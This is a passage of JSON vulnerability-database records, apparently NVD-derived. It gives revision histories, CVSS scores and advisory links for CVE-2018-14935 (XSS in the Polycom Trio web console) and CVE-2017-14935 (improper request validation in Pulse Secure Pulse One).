["https://support.polycom.com/content/dam/polycom-support/global/documentation/stored-cross-site-scripting-in-trio.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2018-14935", "type": "cve", "viewCount": 3}, "differentElements": ["affectedSoftware"], "edition": 3, "lastseen": "2020-10-03T13:20:14"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2018-14935"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "The Web administration console on Polycom Trio devices with software before 5.5.4 has XSS.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:19:48", "references": [], "rev": 2}, "score": {"modified": "2019-05-29T18:19:48", "rev": 2, "value": 2.9, "vector": "NONE"}}, "hash": "8c01c79ef29a6139885f553034a17a6f043850481a4131b6e773a5ee7a99b2cc", "hashmap": [{"hash": "165cab0c975d0c6f3ddb9c33f1f265cb", "key": "published"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "a6c1c4faa2374c7f31296d64e21da942", "key": "title"}, {"hash": "89080accf6cf2e599523c9ff892c5a9c", "key": "href"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "90f8a03631931182856b38c534747c10", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "a333073bc149ce256db3affe0b7de77e", "key": "cvelist"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5ccefbbe6584d198368c716755892f5c", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "6616dc31f9ddee4c577b2d4383ce8d0a", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14935", "id": "CVE-2018-14935", "lastseen": "2019-05-29T18:19:48", "modified": "2018-12-17T15:53:00", "objectVersion": "1.3", "published": "2018-11-15T20:29:00", "references": ["https://support.polycom.com/content/dam/polycom-support/global/documentation/stored-cross-site-scripting-in-trio.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2018-14935", "type": "cve", "viewCount": 2}, "differentElements": ["affectedSoftware"], "edition": 1, "lastseen": "2019-05-29T18:19:48"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "polycom:trio_8500_firmware", "name": "polycom trio 8500 firmware", "operator": "lt", "version": "5.5.4"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2018-14935"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "The Web administration console on Polycom Trio devices with software before 5.5.4 has XSS.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:28:58", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T14:28:58", "rev": 2, "value": 2.9, "vector": "NONE"}}, "hash": "1a155c13e87b718c85843a7df8ffeebb6dd459414d2e518b0284eccd133eb5a6", "hashmap": [{"hash": "165cab0c975d0c6f3ddb9c33f1f265cb", "key": "published"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "a6c1c4faa2374c7f31296d64e21da942", "key": "title"}, {"hash": "89080accf6cf2e599523c9ff892c5a9c", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "a4963fe354f8e3d3c48600d4fac2d27f", "key": "affectedSoftware"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "90f8a03631931182856b38c534747c10", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "a333073bc149ce256db3affe0b7de77e", "key": "cvelist"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5ccefbbe6584d198368c716755892f5c", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "6616dc31f9ddee4c577b2d4383ce8d0a", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14935", "id": "CVE-2018-14935", "lastseen": "2020-09-21T14:28:58", "modified": "2018-12-17T15:53:00", "objectVersion": "1.3", "published": "2018-11-15T20:29:00", "references": ["https://support.polycom.com/content/dam/polycom-support/global/documentation/stored-cross-site-scripting-in-trio.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2018-14935", "type": "cve", "viewCount": 2}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:28:58"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "5ce5e96d3f1002f25f8a89471bae53ab"}, {"key": "affectedSoftware", "hash": "a4963fe354f8e3d3c48600d4fac2d27f"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "f98b3948a4861879ec8a8154e00f328e"}, {"key": "cvelist", "hash": "a333073bc149ce256db3affe0b7de77e"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "4419eb17de947d4d6b67ac07ed8d9064"}, {"key": "cvss3", "hash": "f9048d548aea2a33f8c8fe44e8c9817c"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "6616dc31f9ddee4c577b2d4383ce8d0a"}, {"key": "extraReferences", "hash": "f17f5e1017923b8a6a58f2bff5df6756"}, {"key": "href", "hash": "89080accf6cf2e599523c9ff892c5a9c"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "5ccefbbe6584d198368c716755892f5c"}, {"key": "published", "hash": "165cab0c975d0c6f3ddb9c33f1f265cb"}, {"key": "references", "hash": "90f8a03631931182856b38c534747c10"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "a6c1c4faa2374c7f31296d64e21da942"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "76d94897b98b8b5067d6e3e140eb4f2ab539da45fb8fd2d3856ad789f45ed65e", "viewCount": 7, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-23T00:24:17", "rev": 2}, "score": {"value": 2.9, "vector": "NONE", "modified": "2021-04-23T00:24:17", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "polycom:trio_8500_firmware", "name": "polycom trio 8500 firmware", "operator": "lt", "version": "5.5.4"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "scheme": null, "affectedConfiguration": [{"cpeName": "polycom:trio_8500", "name": "polycom trio 8500", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:polycom:trio_8500_firmware:5.5.4:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "5.5.4", "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:h:polycom:trio_8500:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "https://support.polycom.com/content/dam/polycom-support/global/documentation/stored-cross-site-scripting-in-trio.pdf", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://support.polycom.com/content/dam/polycom-support/global/documentation/stored-cross-site-scripting-in-trio.pdf"}], "immutableFields": []}, {"id": "CVE-2017-14935", "bulletinFamily": "NVD", "title": "CVE-2017-14935", "description": "Pulse Secure Pulse One On-Premise 2.0.1649 and below does not properly validate requests, which allows remote users to query and obtain sensitive information.", "published": "2017-09-30T01:29:00", "modified": "2017-10-06T19:40:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14935", "reporter": "cve@mitre.org", "references": ["http://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40971"], "cvelist": ["CVE-2017-14935"], "type": "cve", "lastseen": "2021-04-23T00:07:49", "history": [{"bulletin": {"affectedSoftware": [{"name": "pulsesecure pulse_one_on-premise", "operator": "eq", "version": "2.0.1649"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:pulsesecure:pulse_one_on-premise:2.0.1649"], "cpe23": ["cpe:2.3:a:pulsesecure:pulse_one_on-premise:2.0.1649:*:*:*:*:*:*:*"], "cvelist": ["CVE-2017-14935"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-20"], "description": "Pulse Secure Pulse One On-Premise 2.0.1649 and below does not properly validate requests, which allows remote users to query and obtain sensitive information.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:16:50", "references": [], "rev": 2}, "score": {"modified": "2019-05-29T18:16:50", "rev": 2, "value": 3.5, "vector": "NONE"}}, "hash": "31a91be223a4b537fde5a9cf1b69a4bdfd00f4d068d738e6bb2344178996c640", "hashmap": [{"hash": "89ebcc235af247fa6f5500e65e8d6e04", "key": "cpe23"}, {"hash": "f30109dfdbfbf783c0b61792a6b2c20a", "key": "cvss2"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "dbb5c0580fd8dc4ea50fe8b34d0e30b8", "key": "description"}, {"hash": "49d781fb6dfa6ff466644692b38e5931", "key": "modified"}, {"hash": "18aae3862510be7424a0b918b87d424f", "key": "cpe"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "a2fb75c8689744eb4a7cb07625ed8d02", "key": "affectedSoftware"}, {"hash": "8a78638b192845f72b22d59c98bb2c18", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "9ae17c199f07ac51e3a7c08a959fd2cf", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "fdcb1292985745cfaefd6741169305e0", "key": "references"}, {"hash": "9976eff579ef3bfd6a4237accaf3acdb", "key": "cvss3"}, {"hash": "8f98885b58bf9703800ebe7376998ee8", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b721f056e538371ee4fe236e4de4209b", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14935", "id": "CVE-2017-14935", "lastseen": "2019-05-29T18:16:50", "modified": "2017-10-06T19:40:00", "objectVersion": "1.3", "published": "2017-09-30T01:29:00", "references": ["http://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40971"], "reporter": "cve@mitre.org", "title": "CVE-2017-14935", "type": "cve", "viewCount": 7}, "differentElements": ["affectedSoftware"], "edition": 1, "lastseen": "2019-05-29T18:16:50"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "pulsesecure:pulse_one_on-premise", "name": "pulsesecure pulse one on-premise", "operator": "eq", "version": "2.0.1649"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:pulsesecure:pulse_one_on-premise:2.0.1649"], "cpe23": ["cpe:2.3:a:pulsesecure:pulse_one_on-premise:2.0.1649:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_one_on-premise:2.0.1649:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2017-14935"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-20"], "description": "Pulse Secure Pulse One On-Premise 2.0.1649 and below does not properly validate requests, which allows remote users to query and obtain sensitive information.", "edition": 4, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:37", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T06:36:37", "rev": 2, "value": 3.5, "vector": "NONE"}}, "extraReferences": [{"name": "http://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40971", "refsource": "CONFIRM", "tags": ["Mitigation", "Patch", "Vendor Advisory"], "url": "http://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40971"}], "hash": "78207661873ea007d723464639187b74163948080d2e35b11a7482e35f6b895d", "hashmap": [{"hash": "89ebcc235af247fa6f5500e65e8d6e04", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "3af1505bb544dda218d75b85115a5f50", "key": "extraReferences"}, {"hash": "f30109dfdbfbf783c0b61792a6b2c20a", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "dbb5c0580fd8dc4ea50fe8b34d0e30b8", "key": "description"}, {"hash": "49d781fb6dfa6ff466644692b38e5931", "key": "modified"}, {"hash": "18aae3862510be7424a0b918b87d424f", "key": "cpe"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "3a4e4aa1fad11f7d923b0b4dcb235b19", "key": "cpeConfiguration"}, {"hash": "8a78638b192845f72b22d59c98bb2c18", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "9ae17c199f07ac51e3a7c08a959fd2cf", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "fdcb1292985745cfaefd6741169305e0", "key": "references"}, {"hash": "9976eff579ef3bfd6a4237accaf3acdb", "key": "cvss3"}, {"hash": "8f98885b58bf9703800ebe7376998ee8", "key": "title"}, {"hash": "fedb53e23a900304adcd990c83f8646c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b721f056e538371ee4fe236e4de4209b", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14935", "id": "CVE-2017-14935", "immutableFields": [], "lastseen": "2021-02-02T06:36:37", "modified": "2017-10-06T19:40:00", "objectVersion": "1.5", "published": "2017-09-30T01:29:00", "references": ["http://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40971"], "reporter": "cve@mitre.org", "title": "CVE-2017-14935", "type": "cve", "viewCount": 9}, "different_elements": ["cpeConfiguration"], "edition": 4, "lastseen": "2021-02-02T06:36:37"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "pulsesecure:pulse_one_on-premise", "name": "pulsesecure pulse one on-premise", "operator": "eq", "version": "2.0.1649"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:pulsesecure:pulse_one_on-premise:2.0.1649"], "cpe23": ["cpe:2.3:a:pulsesecure:pulse_one_on-premise:2.0.1649:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_one_on-premise:2.0.1649:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2017-14935"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-20"], "description": "Pulse Secure Pulse One On-Premise 2.0.1649 and below does not properly validate requests, which allows remote users to query and obtain sensitive information.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T13:07:36", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T13:07:36", "rev": 2, "value": 3.5, "vector": "NONE"}}, "extraReferences": [], "hash": "11d954ba8f1263af44c14869d2af9c7f1192d56602904ea067cce599c1ec6cff", "hashmap": [{"hash": "89ebcc235af247fa6f5500e65e8d6e04", "key": "cpe23"}, {"hash": "f30109dfdbfbf783c0b61792a6b2c20a", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "dbb5c0580fd8dc4ea50fe8b34d0e30b8", "key": "description"}, {"hash": "49d781fb6dfa6ff466644692b38e5931", "key": "modified"}, {"hash": "18aae3862510be7424a0b918b87d424f", "key": "cpe"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "3a4e4aa1fad11f7d923b0b4dcb235b19", "key": "cpeConfiguration"}, {"hash": "8a78638b192845f72b22d59c98bb2c18", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "9ae17c199f07ac51e3a7c08a959fd2cf", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "fdcb1292985745cfaefd6741169305e0", "key": "references"}, {"hash": "9976eff579ef3bfd6a4237accaf3acdb", "key": "cvss3"}, {"hash": "8f98885b58bf9703800ebe7376998ee8", "key": "title"}, {"hash": "fedb53e23a900304adcd990c83f8646c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b721f056e538371ee4fe236e4de4209b", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14935", "id": "CVE-2017-14935", "lastseen": "2020-10-03T13:07:36", "modified": "2017-10-06T19:40:00", "objectVersion": "1.3", "published": "2017-09-30T01:29:00", "references": ["http://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40971"], "reporter": "cve@mitre.org", "title": "CVE-2017-14935", "type": "cve", "viewCount": 8}, "differentElements": ["extraReferences"], "edition": 3, "lastseen": "2020-10-03T13:07:36"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "pulsesecure:pulse_one_on-premise", "name": "pulsesecure pulse one on-premise", "operator": "eq", "version": "2.0.1649"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:pulsesecure:pulse_one_on-premise:2.0.1649"], "cpe23": ["cpe:2.3:a:pulsesecure:pulse_one_on-premise:2.0.1649:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-14935"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-20"], "description": "Pulse Secure Pulse One On-Premise 2.0.1649 and below does not properly validate requests, which allows remote users to query and obtain sensitive information.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:21", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T14:31:21", "rev": 2, "value": 3.5, "vector": "NONE"}}, "hash": "f737b38a1582fe733678d23f18e879d2e7b3364cb86ad605d82c1b20f9bfcd3c", "hashmap": [{"hash": "89ebcc235af247fa6f5500e65e8d6e04", "key": "cpe23"}, {"hash": "f30109dfdbfbf783c0b61792a6b2c20a", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "dbb5c0580fd8dc4ea50fe8b34d0e30b8", "key": "description"}, {"hash": "49d781fb6dfa6ff466644692b38e5931", "key": "modified"}, {"hash": "18aae3862510be7424a0b918b87d424f", "key": "cpe"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "8a78638b192845f72b22d59c98bb2c18", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "9ae17c199f07ac51e3a7c08a959fd2cf", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "fdcb1292985745cfaefd6741169305e0", "key": "references"}, {"hash": "9976eff579ef3bfd6a4237accaf3acdb", "key": "cvss3"}, {"hash": "8f98885b58bf9703800ebe7376998ee8", "key": "title"}, {"hash": "fedb53e23a900304adcd990c83f8646c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b721f056e538371ee4fe236e4de4209b", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14935", "id": "CVE-2017-14935", "lastseen": "2020-09-21T14:31:21", "modified": "2017-10-06T19:40:00", "objectVersion": "1.3", "published": "2017-09-30T01:29:00", "references": ["http://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40971"], "reporter": "cve@mitre.org", "title": "CVE-2017-14935", "type": "cve", "viewCount": 7}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:31:21"}], "edition": 5, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "fedb53e23a900304adcd990c83f8646c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "18aae3862510be7424a0b918b87d424f"}, {"key": "cpe23", "hash": "89ebcc235af247fa6f5500e65e8d6e04"}, {"key": "cpeConfiguration", "hash": "08c5a22504b55a8e2b17323c7c98b298"}, {"key": "cvelist", "hash": "b721f056e538371ee4fe236e4de4209b"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "f30109dfdbfbf783c0b61792a6b2c20a"}, {"key": "cvss3", "hash": "9976eff579ef3bfd6a4237accaf3acdb"}, {"key": "cwe", "hash": "226da5129ffaaee3d5b48e506b957d58"}, {"key": "description", "hash": "dbb5c0580fd8dc4ea50fe8b34d0e30b8"}, {"key": "extraReferences", "hash": 